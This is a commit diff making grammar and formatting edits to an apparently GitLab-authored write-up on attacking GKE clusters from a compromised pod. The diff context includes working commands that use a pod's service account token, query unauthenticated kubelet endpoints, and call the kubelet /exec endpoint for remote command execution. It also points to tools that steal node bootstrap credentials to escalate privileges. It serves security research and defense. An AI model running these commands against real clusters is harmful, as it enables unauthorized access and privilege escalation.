Commit b729f2db authored by Greg Johnson's avatar Greg Johnson
Browse files

minor changes for formatting and grammar

parent 1733569b
......@@ -11,7 +11,7 @@ During the initial research into how one might go about attacking this infrastru
This writeup is therefore here to help explore this type of breach, looking at K8s from an attacker’s perspective having no initial K8s knowledge, but having managed to get a shell though one of the above scenarios. We’ll focus on GKE specifically as this is what we use at GitLab.
We'll start by looking at the main architecture components, specifically those that are interesting for an attacker, then explore what we can do from our initial shell. If you already know about the main K8s (and GKE) components, feel free to skip the "[Architecture Overview](#architecture-overview)" section and go directly to "[Attack Scenario](#attack-scenario)".
# Table of Content
- [Architecture Overview](#architecture-overview)
......@@ -60,8 +60,7 @@ In a generic K8s configuration, the main components/features are the following:
- The Node: It is spawning/running one or multiple pods, usually implemented as Linux machines/VMs (Compute engine VMs in GKE).
- The Master node: The node that host critical components (a storage component (etcd), a REST API server, some controller and scheduler components).
Within K8s, everything is considered as "objects" and managed through the API server. All objects creations/changes are usually submitted in a declarative way, by sending yaml or json files.
The `kubectl` binary is the classic binary client used to interact with this REST API. It is however possible to interact with the API using classic web clients (`curl`, `wget`, etc). Unless configured differently, tokens or private keys will need to be sent in the header of those requests to be accepted (more about auth later).
Within K8s, everything is considered as "objects" and managed through the API server. All objects creations/changes are usually submitted in a declarative way, by sending yaml or json files. The `kubectl` binary is the classic binary client used to interact with this REST API. It is however possible to interact with the API using classic web clients (`curl`, `wget`, etc). Unless configured differently, tokens or private keys will need to be sent in the header of those requests to be accepted (more about auth later).
As drawings are better than long explanations, here are some diagrams showing the main components:
......@@ -342,7 +341,7 @@ You can therefore use the `kubectl` binary you downloaded with the service accou
```
# kubectl --token=`cat /run/secrets/kubernetes.io/serviceaccount/token` --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt -n `cat /run/secrets/kubernetes.io/serviceaccount/namespace` --server=https://$KUBERNETES_PORT_443_TCP_ADDR auth can-i create pods
```
```
Note: When running the `kubectl` binary without auth arguments, it will usually look for those default creds (but we sometimes have to explicitly pass them as arguments)
......@@ -354,7 +353,7 @@ You should start port scanning the default subnet for open ports (don't forget 8
#### Heapster
8082 is the default "heapster" port in GKE. If found, it will give you anonymously some basic information such as:
8082 is the default "heapster" port in GKE. If found, it will give you some basic, anonymous information such as:
- /api/v1/model/namespaces/namespaces/ *<-- which namespaces are available*
- /api/v1/model/nodes/ *<-- list of the nodes*
......@@ -374,16 +373,16 @@ You should start port scanning the default subnet for open ports (don't forget 8
```
For a more complete list of the REST urls, you may want to have a look there: https://github.com/kubernetes-retired/heapster/blob/master/docs/model.md
#### Kubelet (unauth)
#### Kubelet (unauthenticated)
The kubelet API daemon is potentially another source of information, listening on tcp 10255, http and unauth. It contains really powerful debug endpoints (/run, /exec) which in the case of GKE should be disabled by default (that would be too easy..). It should however respond to some basic info requests (path taken from https://github.com/kubernetes/kubernetes/blob/master/pkg/kubelet/server/server.go):
The kubelet API daemon, which is the primary agent running on each node to maintain the desired state of the pod, is potentially another source of information, listening on tcp 10255 for unauthenticated http requests. It contains really powerful debug endpoints (/run, /exec) which in the case of GKE should be disabled by default (that would be too easy..). It should however respond to some basic info requests (path taken from https://github.com/kubernetes/kubernetes/blob/master/pkg/kubelet/server/server.go):
```
curl http://10.8.1.1:10255/pods/
curl http://10.8.1.1:10255/stats/
curl http://10.8.1.1:10255/spec/
curl http://10.8.1.1:10255/metrics/
```
`/pods` is the most interesting endpoint for an attacker, it contains quite a bit of information about pods, IP addresses, container names, secret names, url paths.
`/pods` is the most interesting endpoint for an attacker, it contains quite a bit of information about pods, IP addresses, container names, secret names, and url paths.
#### Metrics
......@@ -452,18 +451,18 @@ If [workload identity](https://cloud.google.com/kubernetes-engine/docs/how-to/wo
The output should contain bootstrapping credentials within the KUBELET_KEY, KUBELET_CERT and CA_CRT environment variables. As stated by Google: *GKE uses instance metadata to configure node VMs, but some of this metadata is potentially sensitive and should be protected from workloads running on the cluster.*
Those credentials have certificate signing request permissions and an attack vector has been found that abuses those credentials to request certificates on behalf of nodes (see https://www.4armed.com/blog/hacking-kubelet-on-gke/ and https://github.com/bgeesaman/kube-env-stealer, congrats to both of them!).
Those credentials have certificate signing request (CSR) permissions and an attack vector has been found that abuses those credentials to request certificates on behalf of nodes (see https://www.4armed.com/blog/hacking-kubelet-on-gke/ and https://github.com/bgeesaman/kube-env-stealer, congrats to both of them!).
Since CSRs are automatically signed, once a certificate is obtained, this certificate can be used to interact with the master API, impersonating the node that was chosen in the certificate signing request.
4armed nicely release [kubeletmein](https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/) to automate the process of getting the initial keys, submitting CSRs and creating config files for the `kubectl` binary.
4armed nicely released [kubeletmein](https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/) to automate the process of getting the initial keys, submitting CSRs and creating config files for the `kubectl` binary.
Bard Geesaman also released some [scripts](https://github.com/bgeesaman/kube-env-stealer/blob/master/gke-kubelet-csr-secret-extractor.sh) to automate all this .
Bard Geesaman also released some [scripts](https://github.com/bgeesaman/kube-env-stealer/blob/master/gke-kubelet-csr-secret-extractor.sh) to automate all this.
At the time of writing, in a default GKE cluster install, the attack still works as it does not rely on a bug but on a default configuration (if the two protections mentioned at the beginning of this paragraph are not used). Depending which nodes you can impersonate, their permissions and the secrets they have access to, you may be able to get to `cluster-admin`. You should refer to the table in the "Authorization" paragraph to look for service accounts that are the most interesting to impersonate.
### Underlying GCP service account
The pods in GKE are running over a GCP VM (their Node) and if requests to the metadata server are made, they will be seen as originating from the node. This allows the pods to query the Node default service account information/credentials. As for the previous attack path, this will only work if [workload identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity) is **not** enable (or, if enabled, you could be lucky and a "binding" between the k8s service account and an underlying powerful GCP service account has been configured, but it is less likely). Depending on the rights/scope associated with the account, it may allow you to expand into GCP (you may want to refer to Chris's post about [GCP privilege escalation](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) at this point!).
The pods in GKE are running over a GCP VM (their Node) and if requests to the metadata server are made, they will be seen as originating from the node. This allows the pods to query the Node default service account information/credentials. As for the previous attack path, this will only work if [workload identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity) is **not** enabled (or, if enabled, you could be lucky and a "binding" between the k8s service account and an underlying powerful GCP service account has been configured, but it is less likely). Depending on the rights/scope associated with the account, it may allow you to expand into GCP (you may want to refer to Chris's post about [GCP privilege escalation](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) at this point!).
To get this service account information:
......@@ -489,12 +488,7 @@ If you’re interested in learning more, the following are some good reads:
- https://alexei-led.github.io/post/k8s_node_shell/
- https://github.com/kvaps/kubectl-node-shell
If you end up on the node, it's a GCP compute VM and you should once more refer to Chris Moberly's post about [GCP privilege escalation](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)!
It is interesting to be aware that by default, the OS image used for Nodes in GKE is the "Container Optimized OS" (COS) made by Google, based on Chromium OS.
If you managed to break out of the pod and get a shell there, you won't have any package management and almost no basic network tools.
However, "COS" has a "toolbox" utility to help debugging, you can find the binary in `/usr/bin/toolbox`(https://cloud.google.com/container-optimized-os/docs/how-to/toolbox). It will pull a docker image, a Debian-like environment, with `apt` as the package management and the classic net tools available. The following shows the first time the toolbox binary is launched:
If you end up on the node, it's a GCP compute VM and you should once more refer to Chris Moberly's post about [GCP privilege escalation](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)! It is interesting to be aware that by default, the OS image used for Nodes in GKE is the "Container Optimized OS" (COS) made by Google, based on Chromium OS. If you managed to break out of the pod and get a shell there, you won't have any package management and almost no basic network tools. However, "COS" has a "toolbox" utility to help debugging, you can find the binary in `/usr/bin/toolbox`(https://cloud.google.com/container-optimized-os/docs/how-to/toolbox). It will pull a docker image, a Debian-like environment, with `apt` as the package management and the classic net tools available. The following shows the first time the toolbox binary is launched:
```
gke-cluster-1-default-pool-81f6e491-qq7g ~ # /usr/bin/toolbox
20180918-00: Pulling from google-containers/toolbox
......@@ -513,7 +507,7 @@ Spawning container root-gcr.io_google-containers_toolbox-20180918-00 on /var/lib
Press ^] three times within 1s to kill container.
root@gke-cluster-1-default-pool-81f6e491-qq7g:~#
```
You will feel more "at home" in the toolbox env, have gcloud installed, better than in the COS classic shell!
You will feel more "at home" in the toolbox env, which will also have gcloud installed. Much better than in the COS classic shell!
## Tools that automate recon and some of those attacks
......@@ -525,7 +519,7 @@ You will feel more "at home" in the toolbox env, have gcloud installed, better t
As there are no other known full GKE attack vectors/paths that can be described (starting from a pod with a zero rights service account), if you could not escalate to something interesting, the best is to try to continue to explore everything available. Below are some of the main component details that can be interesting to look at.
### API server
The master API server is the main entry point in the cluster and you may not be able to get anything out of it. It is however interesting to try to query old API paths or metrics data for instance. Even if usually queried over `kubectl`, it is possible to query the API with `curl/wget`. You will need to submit a bearer token in your request. The API is reachable within the cluster via a "service" (basically a K8s object doing load balancing) called "kubernetes" (its type is "ClusterIP", you can see it by listing services `kubectl get service`).
Here is an example of the REST paths returned from the webroot for a default GKE install:
......@@ -575,13 +569,21 @@ if etcd is somehow accessible, tcp port 2379 (should not be in GKE as fully mana
The Kubelet daemon on the nodes also has an API server. You should check if it is enforcing authentication (port https/10250, by default in GKE, authentication is turned on), see if you can attack it instead of the Master API server (useful also if the master API server is firewalled). You can try to list pods as a test:
`curl -sk https://<node_ip>:10250/pods/`
The API server on the Kubelet is not documented (*The kubelet can also listen for HTTP and respond with a simple API (underspec’d currently)*), but the [source code](https://github.com/kubernetes/kubernetes/blob/master/pkg/kubelet/server/server.go#L544) shows the following debug enpoints are potentially available:
The API server on the Kubelet is not documented (*The kubelet can also listen for HTTP and respond with a simple API (underspec’d currently)*), but the [source code](https://github.com/kubernetes/kubernetes/blob/master/pkg/kubelet/server/server.go#L544) shows the following debug endpoints are potentially available. I've added formatting for readability:
```
paths := []string{
"/run/", "/exec/", "/attach/", "/portForward/", "/containerLogs/",
"/runningpods/", pprofBasePath, logsPath}
```
paths := []string {
"/run/",
"/exec/",
"/attach/",
"/portForward/",
"/containerLogs/",
"/runningpods/",
pprofBasePath,
logsPath
}
```
if you are lucky enough to have those debug endpoints enabled and you have some valid token, `/exec/` is there and provides remote shell functionality (nice!):
`curl -k -XPOST -H "Authorization: Bearer xxxxx" "https://<node IP>:10250/exec/<namespace>/<pod name>/<container name>" -d "command=id" -d "input=1" -d "output=1" -d "tty=1"`
......@@ -598,7 +600,7 @@ You should however get a response similar to this:
"message": "Upgrade request required",
"reason": "BadRequest",
"code": 400
```
```
The `upgrade request` response is because websockets should be used. The current websocket implementation of the kubelet API server requires a specific websocket header (`sec-websocket-protocol: v4.channel.k8s.io`).
We didn't code any client (will update if we code a small one), but execution can still be achieved blindly using openssl as ssl client, pasting a raw request into it (which is probably the easiest as an attacker, less tools to download/install):
......@@ -644,11 +646,9 @@ https://kubernetes.io/docs/concepts/architecture/master-node-communication/: *"
Helm charts are a way to deploy a full K8s cluster, basically combining multiple yaml config files together, hence often considered as being a "package manager" for K8s.
Before v3 of Helm, a server component was used, called "Tiller". This component was installed within a pod and is known to be a classic privilege escalation weakness as it accepts, within the cluster, connections unauth to deploy any "chart". Attackers being on a pod can of course abuse this to deploy pods of their choosing, create service accounts, etc.
A good writeup from [ropnop](https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/) is perfectly describing the type of chart you would want to deploy as an attacker. Basically downloading the binary `helm` client and pushing charts that help you read files on the Tiller pod (the Tiller service account is usually cluster admin) or create other pods/service accounts you can use to elevate privileges.
Before v3 of Helm, a server component was used, called "Tiller". This component was installed within a pod and is known to be a classic privilege escalation weakness as it accepts, within the cluster, unauthenticated connections to deploy any "chart". Attackers being on a pod can of course abuse this to deploy pods of their choosing, create service accounts, etc.
Helm version 3 has completely removed the Tiller component as it is/was indeed difficult to integrate securely within the cluster.
A good writeup from [ropnop](https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/) perfectly describes the type of chart you would want to deploy as an attacker. Basically downloading the binary `helm` client and pushing charts that help you read files on the Tiller pod (the Tiller service account is usually cluster admin) or create other pods/service accounts you can use to elevate privileges. Helm version 3 has completely removed the Tiller component as it is/was indeed difficult to integrate securely within the cluster.
## Cheat Sheet
......
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment